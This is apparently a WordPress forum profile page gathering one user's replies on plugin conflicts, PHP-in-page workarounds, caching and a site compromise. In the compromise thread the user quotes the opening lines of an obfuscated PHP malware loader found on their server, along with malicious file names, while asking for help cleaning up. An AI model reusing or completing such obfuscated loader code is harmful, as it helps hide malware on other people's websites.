yellofish

Update:
WP version: 4.9.6
WPS Hide Login Version: 1.3.4.2

you must have another plugin that conflicts with this one.

That is possible, but isn’t solving the problem.

I will probably remove WPS Hide and rename the pages manually.

To answer my own question, I found a good workaround that I like:

I installed the “PHP Everywhere” Plugin. So on the page I just write [php_everywhere].

Unfortunately the input box for your own code is very small. That is fine for <?php echo 'hello mars'; ?> but totally unsuitable for long php code.

So I did this code in the little box:

<?php
$path = $_SERVER['DOCUMENT_ROOT'];
   $path .= "file_store/index.php";
   include($path);
?>

I created a directory next to wordpress (but you can do that wherever you want, does not has to be browser reachable)

The index.php page I then write like any other PHP page and upload to the webside.

If you do any changes on your index.php you should still save the WordPress page, even though you didn’t change anything there. It’s because to clear the cache.

Ok, sadly I removed the pop ups. This is better than getting kicked out though.

I rest my case and will think of other uses for your otherwise nice plugin.

BTW, this is correct link:

adsense policies @ pop ups

• This reply was modified 6 years, 10 months ago by yellofish.

I wasn’t too clear:

The Android app I used was FamilyGTG (it’s free and exports Gedcom, free version can’t import though).

What I did in the meantime was to load the Gedcom to Gramps (freeware) for Windows, edited it (there were a few errors not visible in FamilyGTG), I corrected them and not it loads in RootsPersona

I deleted quite a lot of PHP files with base64 script in it. I can see plenty of hits looking for exactly those files from various IPs. I also installed Wordfence and did a scan (it needed .htaccess modification due to LiteSpeed). I guess I am pretty OK for now.

Another thing I did is renaming the /wp-content/ folder to something else. That will irritate the bots that look for certain plugins for a while (I hope).

Below just some idea how one of those (non base64) look like:

<?php ${"\x47\x4c\x4fB\x41\x4c\x53"}['le87e270'] = "\x7d\x4a\x7a\x30\x41\x50\x52\x68\x4e\x66\x27\x44\x35\xd\x2b\x34\x4c\x67\x3f\x3a\x5e\x7b\x40\x5f\x39\x28\x48\x69\x4f\x5a\x3b\x76\x37\x2c\x24\x6c\x56\x29\x74\x58\x6a\x64\x4d\x4b\x75\x73\x3c\x36\x7e\x20\x49\x7c\x2e\x25\x2f\x63\x59\x38\x5d\x60\x46\x22\x2a\x45\x31\x78\x77\x5b\x72\x5c\x55\x32\x9\xa\x33\x3d\x65\x2d\x79\x54\x43\x6e\x23\x47\x6b\x42\x6d\x21\x61\x70\x53\x6f\x3e\x57\x51\x71\x62\x26";
$GLOBALS[$GLOBALS['le87e270'][86].$GLOBALS['le87e270'][47].$GLOBALS['le87e270'][76].$GLOBALS['le87e270'][15].$GLOBALS['le87e270'][3].$GLOBALS['le87e270'][15]] = $GLOBALS['le87e270'][55].$GLOBALS['le87e270'][7].$GLOBALS['le87e270'][68];

I found favicon****.ico files that contained PHP code, that certainly can’t be right or?

Also found 2 scrips the SPAM delivery identified as ‘sender’:

/public_html/domain01.coms/wp-content/advanced-cache.php

/public_html/domain01.org/wp-admin/js/widgets/xackoaqb.php

xackoaqb.php was a very new file, but advanced-cache.php was a few month old.

What is best now? Completely delete and reinstall the domains?

Correct, Sucuri didn’t do anything. I got another malicious code injection.

They install code and send SPAM from the infected domain.

Any hints how to prevent that are appreciated.

Some more details. 2 Sites got hacked. Both were 4.8.2 with all updates. One was just about 1 week old.

They put a file called ssegtj.zip in the root directory.

In it are

/goren/ > 14 files
/hopeir/ > 15 files
.htaccess
otiarw.php
vrairue.php

I wonder how they managed to get that on the site?

In the meantime I installed the sucuri plugin and I hope that can help a little. Can’t it?

I installed WP from a docker (shared hosting). I have no security plugin though, I just saw that there are such plugins.

I should actually delete this question, but let it stay anyway.

Issue is solve. It was with the Fastest Cache plugin. I deleted the cache and it’s fine now.

A bit poor performance by FC that it wasn’t doing any cache update for 2+ month.

I tried many things and couldn’t find a workaround. Finally this link helped me a lot and works perfectly ?? >>

https://www.ads-software.com/plugins/all-in-one-seo-pack/

Here is an update to my problem:

I isolated the problem, it’s with PHP function on my pages. I write pages often in PHP and I use the Exec-PHP plugin for that.

Here is a code example that will break my page and return a blank page:

<?php

function writeMsg() {
    echo "Hello world!";
}

writeMsg(); // call the function
?>

I can reproduce it on two WP domains. If there is any Yoast user that uses PHP on their pages I would appreciate if you can test it and see what comes out. The snipped is all you need, you don’t need any additional lines of code.

• This reply was modified 7 years, 10 months ago by yellofish.
• This reply was modified 7 years, 10 months ago by yellofish.

Yeah, I deleted that plugin now. Will probably take a few days till its out of all cache.

I will set the social icons manually.

Here is a page:

https://www.5-day-shenzhen-visa.com

I used https://www.webpagetest.org to see what’s loading. I guess it might be theme related.

I like to add that I used a little PHP on 2 pages (the FAQ), and no own CSS at all.

@jan
I have a social media plugin, I use it only for Facebook and G+. I did disable it before and the pages in question were still called.

• This reply was modified 7 years, 10 months ago by yellofish.

I have the same problem.

WP 4.7
Cloudflare 3.1.1
All plugins are disabled, except cloudflare
I have no root access

So what next?